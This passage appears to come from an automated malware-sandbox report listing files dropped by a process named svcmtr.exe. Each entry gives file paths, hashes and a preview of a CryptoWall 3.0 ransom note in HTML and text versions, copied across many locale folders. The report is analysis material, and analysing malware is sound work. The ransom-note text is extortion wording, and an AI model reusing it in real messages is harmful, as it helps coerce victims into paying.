                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
